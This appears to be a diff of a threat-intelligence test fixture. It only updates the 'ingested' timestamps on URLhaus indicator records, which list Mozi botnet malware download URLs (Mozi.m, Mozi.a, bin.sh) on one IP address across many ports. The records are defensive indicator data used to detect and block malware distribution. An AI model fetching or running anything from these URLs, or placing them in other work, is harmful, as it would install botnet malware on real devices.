@@ -8573,7 +8573,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025775100Z", + "ingested": "2021-12-14T14:56:15.726457953Z", "original": "{\"id\":\"961369\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961369/\",\"url\":\"http://89.160.20.156:38837/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -8622,7 +8622,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025782Z", + "ingested": "2021-12-14T14:56:15.726458312Z", "original": "{\"id\":\"961366\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961366/\",\"url\":\"http://89.160.20.156:37814/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -8671,7 +8671,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025789100Z", + "ingested": "2021-12-14T14:56:15.726458666Z", "original": "{\"id\":\"961367\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961367/\",\"url\":\"http://89.160.20.156:47507/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -8720,7 +8720,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025795900Z", + "ingested": "2021-12-14T14:56:15.726459024Z", "original": "{\"id\":\"961365\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961365/\",\"url\":\"http://89.160.20.156:47140/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:18:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -8769,7 +8769,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025802900Z", + "ingested": "2021-12-14T14:56:15.726459385Z", "original": "{\"id\":\"961363\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961363/\",\"url\":\"http://89.160.20.156:41514/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:11 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -8818,7 +8818,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025811100Z", + "ingested": "2021-12-14T14:56:15.726459747Z", "original": "{\"id\":\"961364\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961364/\",\"url\":\"http://89.160.20.156:58748/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:11 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -8867,7 +8867,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025818500Z", + "ingested": "2021-12-14T14:56:15.726460105Z", "original": "{\"id\":\"961362\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961362/\",\"url\":\"http://89.160.20.156:51183/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -8916,7 +8916,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025825300Z", + "ingested": "2021-12-14T14:56:15.726460467Z", "original": "{\"id\":\"961361\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961361/\",\"url\":\"http://89.160.20.156:42104/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -8965,7 +8965,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025832200Z", + "ingested": "2021-12-14T14:56:15.726460970Z", "original": "{\"id\":\"961354\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961354/\",\"url\":\"http://89.160.20.156:53130/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -9014,7 +9014,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025839200Z", + "ingested": "2021-12-14T14:56:15.726461332Z", "original": "{\"id\":\"961355\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961355/\",\"url\":\"http://89.160.20.156:57768/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -9063,7 +9063,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025846100Z", + "ingested": "2021-12-14T14:56:15.726461682Z", "original": "{\"id\":\"961356\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961356/\",\"url\":\"http://89.160.20.156:34541/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -9112,7 +9112,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025853Z", + "ingested": "2021-12-14T14:56:15.726462040Z", "original": "{\"id\":\"961357\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961357/\",\"url\":\"http://89.160.20.156:51344/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -9161,7 +9161,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025859900Z", + "ingested": "2021-12-14T14:56:15.726462512Z", "original": "{\"id\":\"961358\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961358/\",\"url\":\"http://89.160.20.156:40084/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -9210,7 +9210,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025866800Z", + "ingested": "2021-12-14T14:56:15.726462871Z", "original": "{\"id\":\"961359\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961359/\",\"url\":\"http://89.160.20.156:60457/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -9259,7 +9259,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025873700Z", + "ingested": "2021-12-14T14:56:15.726463245Z", "original": "{\"id\":\"961360\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961360/\",\"url\":\"http://89.160.20.156:34906/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -9308,7 +9308,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025880600Z", + "ingested": "2021-12-14T14:56:15.726463590Z", "original": "{\"id\":\"961353\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961353/\",\"url\":\"http://89.160.20.156:59847/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:10:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -9357,7 +9357,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025887700Z", + "ingested": "2021-12-14T14:56:15.726463947Z", "original": "{\"id\":\"961352\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961352/\",\"url\":\"http://89.160.20.156:47873/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:09:00 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -9406,7 +9406,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025894500Z", + "ingested": "2021-12-14T14:56:15.726464305Z", "original": "{\"id\":\"961349\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961349/\",\"url\":\"http://89.160.20.156:48645/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -9455,7 +9455,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025901400Z", + "ingested": "2021-12-14T14:56:15.726464667Z", "original": "{\"id\":\"961350\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961350/\",\"url\":\"http://89.160.20.156:36524/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -9504,7 +9504,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025908100Z", + "ingested": "2021-12-14T14:56:15.726465023Z", "original": "{\"id\":\"961351\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961351/\",\"url\":\"http://89.160.20.156:38726/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -9553,7 +9553,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025916700Z", + "ingested": "2021-12-14T14:56:15.726465380Z", "original": "{\"id\":\"961345\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961345/\",\"url\":\"http://89.160.20.156:41149/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:05:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -9602,7 +9602,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025924Z", + "ingested": "2021-12-14T14:56:15.726465806Z", "original": "{\"id\":\"961346\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961346/\",\"url\":\"http://89.160.20.156:46993/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:05:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -9651,7 +9651,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025931Z", + "ingested": "2021-12-14T14:56:15.726466271Z", "original": "{\"id\":\"961347\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961347/\",\"url\":\"http://89.160.20.156:39190/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:05:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -9700,7 +9700,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025937900Z", + "ingested": "2021-12-14T14:56:15.726466640Z", "original": "{\"id\":\"961348\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961348/\",\"url\":\"http://89.160.20.156:48344/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:05:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -9750,7 +9750,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025944900Z", + "ingested": "2021-12-14T14:56:15.726467006Z", "original": "{\"id\":\"961344\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961344/\",\"url\":\"http://89.160.20.156:58427/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:04:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", @@ -9799,7 +9799,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025951800Z", + "ingested": "2021-12-14T14:56:15.726467386Z", "original": "{\"id\":\"961343\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961343/\",\"url\":\"http://89.160.20.156:41921/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:02:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -9849,7 +9849,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025958700Z", + "ingested": "2021-12-14T14:56:15.726467895Z", "original": "{\"id\":\"961342\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961342/\",\"url\":\"http://89.160.20.156:47140/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:55:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", 
@@ -9898,7 +9898,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025965700Z", + "ingested": "2021-12-14T14:56:15.726468249Z", "original": "{\"id\":\"961341\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961341/\",\"url\":\"http://89.160.20.156:34789/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:52:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -9947,7 +9947,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025972500Z", + "ingested": "2021-12-14T14:56:15.726468619Z", "original": "{\"id\":\"961340\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961340/\",\"url\":\"http://89.160.20.156:37634/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -9996,7 +9996,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025979400Z", + "ingested": "2021-12-14T14:56:15.726468984Z", "original": "{\"id\":\"961339\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961339/\",\"url\":\"http://89.160.20.156:41636/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -10045,7 +10045,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025986300Z", + "ingested": "2021-12-14T14:56:15.726469351Z", "original": "{\"id\":\"961338\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961338/\",\"url\":\"http://89.160.20.156:32907/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:51:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -10094,7 +10094,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025993200Z", + "ingested": "2021-12-14T14:56:15.726469766Z", "original": "{\"id\":\"961336\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961336/\",\"url\":\"http://89.160.20.156:57568/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -10143,7 +10143,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026000400Z", + "ingested": "2021-12-14T14:56:15.726470124Z", "original": "{\"id\":\"961337\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961337/\",\"url\":\"http://89.160.20.156:40740/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:51:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -10192,7 +10192,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026007400Z", + "ingested": "2021-12-14T14:56:15.726470481Z", "original": "{\"id\":\"961331\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961331/\",\"url\":\"http://89.160.20.156:35927/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -10241,7 +10241,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026014300Z", + "ingested": "2021-12-14T14:56:15.726470845Z", "original": "{\"id\":\"961332\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961332/\",\"url\":\"http://89.160.20.156:55558/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -10290,7 +10290,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026021300Z", + "ingested": "2021-12-14T14:56:15.726471437Z", "original": "{\"id\":\"961333\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961333/\",\"url\":\"http://89.160.20.156:60558/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -10339,7 +10339,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026028300Z", + "ingested": "2021-12-14T14:56:15.726471796Z", "original": "{\"id\":\"961334\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961334/\",\"url\":\"http://89.160.20.156:59624/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -10388,7 +10388,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026035200Z", + "ingested": "2021-12-14T14:56:15.726472149Z", "original": "{\"id\":\"961335\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961335/\",\"url\":\"http://89.160.20.156:39386/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -10437,7 +10437,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026042300Z", + "ingested": "2021-12-14T14:56:15.726473235Z", "original": "{\"id\":\"961322\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961322/\",\"url\":\"http://89.160.20.156:46289/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -10486,7 +10486,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026049300Z", + "ingested": "2021-12-14T14:56:15.726473599Z", "original": "{\"id\":\"961323\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961323/\",\"url\":\"http://89.160.20.156:34951/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -10535,7 +10535,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026056200Z", + "ingested": "2021-12-14T14:56:15.726474097Z", "original": "{\"id\":\"961324\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961324/\",\"url\":\"http://89.160.20.156:47594/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -10584,7 +10584,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026063200Z", + "ingested": "2021-12-14T14:56:15.726474463Z", "original": "{\"id\":\"961325\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961325/\",\"url\":\"http://89.160.20.156:55792/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -10633,7 +10633,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026070Z", + "ingested": "2021-12-14T14:56:15.726474852Z", "original": "{\"id\":\"961326\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961326/\",\"url\":\"http://89.160.20.156:35271/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -10682,7 +10682,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.026076900Z", + "ingested": "2021-12-14T14:56:15.726475227Z", "original": "{\"id\":\"961327\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961327/\",\"url\":\"http://89.160.20.156:36300/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -10731,7 +10731,7 @@ } }, 